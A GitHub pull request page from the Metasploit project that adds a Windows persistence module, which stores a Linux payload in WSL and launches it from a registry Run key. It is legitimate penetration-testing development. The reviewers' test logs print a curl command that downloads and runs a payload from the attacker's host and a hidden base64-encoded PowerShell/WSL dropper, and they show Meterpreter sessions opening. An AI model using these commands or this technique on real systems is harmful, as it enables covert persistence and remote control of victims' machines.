Skip to content

Windows WSL registry persistence #20701

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
msutovsky-r7 merged 4 commits into from
Nov 20, 2025
Merged

Windows WSL registry persistence #20701

msutovsky-r7 merged 4 commits into from
Nov 20, 2025

Conversation

@h00die
Copy link
Contributor

@h00die h00die commented Nov 16, 2025

Fixes #20683
Creates a new Windows persistence by putting a LINUX payload in WSL and executing it from the registry. Does your Windows AV detect Linux payloads? Hope so!

Also ninjas in a patch to where a crash would happen with reverse_ssh payloads because there was no wfsdelay

Verification

  • Start msfconsole
  • exploit the box somehow
  • use exploit/windows/persistence/wsl/registry
  • set SESSION <id>
  • exploit
  • Verify persistence is created
  • Verify cleanup works
  • Document is updated and correct

@msutovsky-r7 msutovsky-r7 self-assigned this Nov 17, 2025
msutovsky-r7
msutovsky-r7 reviewed Nov 18, 2025
View reviewed changes
@msutovsky-r7
Copy link
Contributor

msutovsky-r7 commented Nov 18, 2025 

msf exploit(windows/persistence/wsl/registry) > run verbose=true 
[*] Command to run on remote host: curl -so ./vTOasmulJkca http://192.168.168.128:8080/Qkf34tA1N4T--896aQCPmg;chmod +x ./vTOasmulJkca;./vTOasmulJkca&
[*] Exploit running as background job 12.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on 192.168.168.128:8080
[*] HTTP server started
[*] Adding resource /Qkf34tA1N4T--896aQCPmg
[*] Started reverse TCP handler on 192.168.168.128:9999 
msf exploit(windows/persistence/wsl/registry) > [!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows. This module works with: Unix, Linux.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cLlzpsCSmQjDhZN
[+] The target is vulnerable. Registry writable and WSL installed
[*] Root path is HKCU
[*] Enumerating WSL Instances
WSL
===

#  Instance_Name  State    Version  Default
-  -------------  -----    -------  -------
1  Ubuntu         Running  2        true

[*] Writing payload to: /home/ms/FNiiQC
powershell.exe -WindowStyle Hidden -Command "wsl bash -lc 'echo Y3VybCAtc28gLi92VE9hc211bEprY2EgaHR0cDovLzE5Mi4xNjguMTY4LjEyODo4MDgwL1FrZjM0dEExTjRULS04OTZhUUNQbWc7Y2htb2QgK3ggLi92VE9hc211bEprY2E7Li92VE9hc211bEprY2Em | base64 -d > /home/ms/FNiiQC'"
[+] Payload wrote successfully
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\7PVpLpaz
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/DESKTOP-FL6SVUR_20251118.5820/DESKTOP-FL6SVUR_20251118.5820.rc
[*] 192.168.168.221 - Meterpreter session 11 closed.  Reason: Died
[*] 192.168.168.221 - Meterpreter session 12 closed.  Reason: Died
[*] Client 192.168.168.221 requested /Qkf34tA1N4T--896aQCPmg
[*] Sending payload to 192.168.168.221 (curl/8.5.0)
[*] Meterpreter session 13 opened (192.168.168.128:9999 -> 192.168.168.221:59372) at 2025-11-18 16:00:25 +0100

msf exploit(windows/persistence/wsl/registry) > sessions 

Active sessions
===============

  Id  Name  Type                   Information                       Connection
  --  ----  ----                   -----------                       ----------
  13        meterpreter x64/linux  ms @ DESKTOP-FL6SVUR.localdomain  192.168.168.128:9999 -> 192.168.168.221:59372 (::1)

msf exploit(windows/persistence/wsl/registry) > sessions  13
[*] Starting interaction with 13...

meterpreter > sysinfo 
Computer     : DESKTOP-FL6SVUR.localdomain
OS           : Ubuntu 24.04 (Linux 6.6.87.2-microsoft-standard-WSL2)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: ms

@h00die
Copy link
Contributor Author

h00die commented Nov 18, 2025

Good to see it tested on WSL 2!

msutovsky-r7
msutovsky-r7 reviewed Nov 19, 2025
View reviewed changes
Copy link
Contributor

@msutovsky-r7 msutovsky-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more. 

msf exploit(windows/persistence/wsl/registry) > run verbose=true 
[*] Command to run on remote host: curl -so ./OuYASrLw http://192.168.168.128:8080/HygsSaoDfedPTzwLqWRI2A;chmod +x ./OuYASrLw;./OuYASrLw&
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/wsl/registry) > 
[*] Fetch handler listening on 192.168.168.128:8080
[*] HTTP server started
[*] Adding resource /HygsSaoDfedPTzwLqWRI2A
[*] Started reverse TCP handler on 192.168.168.128:4444 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows. This module works with: Unix, Linux.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rjxAUFrhShlH6RC
[+] The target is vulnerable. Registry writable and WSL installed
[*] Root path is HKCU
[*] Enumerating WSL Instances
WSL
===

#  Instance_Name  State    Version  Default
-  -------------  -----    -------  -------
1  Ubuntu         Running  2        true

[*] Writing payload to: /home/ms/vLcySFDA
[+] Payload wrote successfully
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\972rGv1z
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/DESKTOP-FL6SVUR_20251119.1506/DESKTOP-FL6SVUR_20251119.1506.rc
[*] 192.168.168.221 - Meterpreter session 1 closed.  Reason: Died

msf exploit(windows/persistence/wsl/registry) > 
[*] Client 192.168.168.221 requested /HygsSaoDfedPTzwLqWRI2A
[*] Sending payload to 192.168.168.221 (curl/8.5.0)
[*] Command shell session 2 opened (192.168.168.128:4444 -> 192.168.168.221:51234) at 2025-11-19 12:17:03 +0100

msf exploit(windows/persistence/wsl/registry) > sessions 2
[*] Starting interaction with 2...

id
uid=1000(ms) gid=1000(ms) groups=1000(ms),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users)

@msutovsky-r7 msutovsky-r7 added the rn-modules release notes for new or majorly enhanced modules label Nov 20, 2025
msutovsky-r7
msutovsky-r7 approved these changes Nov 20, 2025
View reviewed changes
Copy link
Contributor

@msutovsky-r7 msutovsky-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more. 

msf exploit(windows/persistence/wsl/registry) > run verbose=true 
[*] Command to run on remote host: curl -so ./siucFmDu http://192.168.168.128:8080/M1We21fZKyvgtWK9IWStLA;chmod +x ./siucFmDu;./siucFmDu&
[*] Exploit running as background job 0.
[*] Fetch handler listening on 192.168.168.128:8080
[*] HTTP server started
[*] Adding resource /M1We21fZKyvgtWK9IWStLA
[*] Started reverse TCP handler on 192.168.168.128:4444 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows. This module works with: Unix, Linux.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\XtZdtoBY3e6LPMq
[+] The target is vulnerable. Registry writable and WSL installed
[*] Root path is HKCU
[*] Enumerating WSL Instances
WSL
===

#  Instance_Name  State    Version  Default
-  -------------  -----    -------  -------
1  Ubuntu         Running  2        true

[*] Writing payload to: /home/ms/EhYwlsGxQUDG. WSL may take a little while to start up...
[+] Payload wrote successfully
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\0P4pS3uk
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/DESKTOP-FL6SVUR_20251120.5607/DESKTOP-FL6SVUR_20251120.5607.rc
[*] 192.168.168.221 - Meterpreter session 1 closed.  Reason: Died
[*] Client 192.168.168.221 requested /M1We21fZKyvgtWK9IWStLA
[*] Sending payload to 192.168.168.221 (curl/8.5.0)
[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 192.168.168.221:56566) at 2025-11-20 11:58:22 +0100

msf exploit(windows/persistence/wsl/registry) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : DESKTOP-FL6SVUR.localdomain
OS           : Ubuntu 24.04 (Linux 6.6.87.2-microsoft-standard-WSL2)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: ms

@github-project-automation github-project-automation bot moved this from Todo to In Progress in Metasploit Kanban Nov 20, 2025
@msutovsky-r7 msutovsky-r7 merged commit e2097ee into rapid7:master Nov 20, 2025
67 of 75 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Nov 20, 2025
@msutovsky-r7
Copy link
Contributor

msutovsky-r7 commented Nov 20, 2025
edited by adfoster-r7
Loading

Release Notes

Adds a new Windows persistence module - the WSL registry module. The module will create registry entries (Run, RunOnce) to run a Linux payload stored in WSL.

@h00die h00die deleted the windows_wsl_persistence branch November 20, 2025 21:53
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@msutovsky-r7 msutovsky-r7 msutovsky-r7 approved these changes

Assignees

@msutovsky-r7 msutovsky-r7

Labels

bug docs module rn-modules release notes for new or majorly enhanced modules

Projects

Metasploit Kanban
Archived in project

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

payload/cmd/unix/reverse_ssh payload broken

2 participants

@h00die @msutovsky-r7